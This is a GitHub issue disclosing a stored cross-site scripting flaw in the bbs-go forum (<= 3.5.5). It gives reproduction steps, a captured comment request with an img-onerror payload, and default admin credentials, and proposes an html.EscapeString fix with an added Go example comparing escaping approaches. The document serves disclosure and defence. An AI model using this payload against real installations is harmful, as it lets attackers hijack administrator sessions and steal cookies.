bbs-go stored cross-site scripting vulnerability 1 #206

Open
cuiyan142857 opened this issue Jun 13, 2023 · 1 comment

Comments

@cuiyan142857

Vulnerability name
bbs-go stored cross-site scripting vulnerability

Affected versions
bbs-go <= 3.5.5

Vulnerability type
Stored cross-site scripting

Severity
High

Summary
bbs-go is an open-source community system built in Go with a front-end/back-end split: the Go back end provides an API for data, the user-facing interface is rendered with Nuxt.js, and the admin interface is based on element-ui.
bbs-go has a stored cross-site scripting vulnerability caused by the program not properly handling user input. After registering, a user can inject a malicious JavaScript script in an article comment; when an administrator clicks to view comments under Admin - Content Management - Article Management, the malicious script is triggered, leaking cookies and other information.
The following products and versions are affected: bbs-go <= 3.5.5
bbs-go download address: https://github.com/mlogclub/bbs-go

Verification
Precondition: a registered, logged-in user
Steps:

  1. Run a bbs-go = 3.5.5 environment
  2. Configure Burp Suite to capture requests
  3. Register a user test4 on the front end
  4. Log in as test4
  5. Click "Articles" and find an article, or publish one yourself
  6. Enter the payload in a comment and publish it
Full request:
POST /api/comment/create HTTP/1.1
Host: 192.168.111.130:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Client: bbs-go-site
X-User-Token: 1c1c47cb70f447589944117cb339518b
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://192.168.111.130:3000
Connection: close
Referer: http://192.168.111.130:3000/article/4
Cookie: Hm_lvt_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm_lpvt_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b

entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId=
  7. Log in to the admin side with the administrator account admin/123456, click Content Management - Article Management, select this article, and view its comments

The XSS is triggered
Remediation suggestion
bbs-go\server\controllers\admin\comment_controller.go:71
Change it to builder.Put("content", html.EscapeString(comment.Content))
HTML-entity-encoding comment.Content temporarily resolves the vulnerability.
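The fix proposed in the report and the behaviour it changes, as an added Go example that is not bbs-go's own code: it decodes the captured form body shown above with net/url, renders the stored content the way the unfixed admin view would (raw concatenation), then with the proposed html.EscapeString, and for comparison with html/template, which escapes per HTML context. The Comment type, the view functions, the `<div>` wrapper and the ContainsLiveTag check are assumptions for illustration; the form body and payload are taken from the request in the report.

```go
package main

import (
	"fmt"
	"html"
	"html/template"
	"net/url"
	"strings"
)

// RawBody is the URL-encoded form body of the captured POST /api/comment/create
// request from the report (entityId and payload are the reporter's values).
const RawBody = "entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId="

// Comment mirrors the fields the admin comment view needs. The type name is an
// assumption for this example; it is not bbs-go's own struct.
type Comment struct {
	ID      int64
	Content string
}

// ParseCommentContent decodes the form body and returns the "content" field
// exactly as the server would store it: URL-decoded, but not HTML-encoded.
func ParseCommentContent(body string) (string, error) {
	vals, err := url.ParseQuery(body)
	if err != nil {
		return "", err
	}
	return vals.Get("content"), nil
}

// VulnerableView mimics the unfixed admin controller: the stored content is
// placed into the response unchanged, so a stored <img onerror> tag becomes
// live markup when the admin page renders it.
func VulnerableView(c Comment) string {
	return "<div class=\"comment\">" + c.Content + "</div>"
}

// EscapedView applies the report's fix: html.EscapeString turns <, >, &, ' and "
// into entities, so the payload is displayed as text instead of parsed as a tag.
func EscapedView(c Comment) string {
	return "<div class=\"comment\">" + html.EscapeString(c.Content) + "</div>"
}

// commentTmpl is the more general alternative: html/template escapes every
// interpolated value according to the HTML context it lands in, which also
// covers attribute and script contexts that a single EscapeString call does not.
var commentTmpl = template.Must(template.New("c").Parse(`<div class="comment">{{.Content}}</div>`))

// TemplateView renders the comment through html/template.
func TemplateView(c Comment) (string, error) {
	var sb strings.Builder
	if err := commentTmpl.Execute(&sb, c); err != nil {
		return "", err
	}
	return sb.String(), nil
}

// ContainsLiveTag is a crude check used only to make the difference visible:
// does the rendered output still contain an unescaped "<img" tag?
func ContainsLiveTag(rendered string) bool {
	return strings.Contains(strings.ToLower(rendered), "<img")
}

func main() {
	content, err := ParseCommentContent(RawBody)
	if err != nil {
		panic(err)
	}
	c := Comment{ID: 1, Content: content}
	fmt.Println("stored content :", content)
	fmt.Println("vulnerable view:", VulnerableView(c), "live tag:", ContainsLiveTag(VulnerableView(c)))
	fmt.Println("escaped view   :", EscapedView(c), "live tag:", ContainsLiveTag(EscapedView(c)))
	tv, err := TemplateView(c)
	if err != nil {
		panic(err)
	}
	fmt.Println("template view  :", tv, "live tag:", ContainsLiveTag(tv))
}
```

For a comment body that is only ever shown as text, EscapeString at the render site is enough; if the admin view also puts user content into attributes, URLs or inline scripts, html/template is the safer default because it picks the escaper for each context rather than relying on every call site to remember one.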

@Evil0ctal

Can this issue be reproduced in the latest version?
